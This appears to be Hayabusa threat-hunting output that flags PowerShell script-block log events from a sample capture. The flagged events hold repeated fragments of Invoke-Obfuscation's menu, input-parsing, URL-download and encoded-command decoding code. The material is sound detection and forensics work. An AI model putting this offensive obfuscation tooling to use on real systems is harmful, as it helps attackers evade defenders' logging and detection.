Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. $AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] $StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { $NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. $UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. # Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. # Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). $TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { $NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. $UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. # Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. # Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). $TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,low,Evas,Use Remove-Item to Delete File,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ove filtering step. # E.g. Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. $UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. $EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' -NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ove filtering step. # E.g. Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } 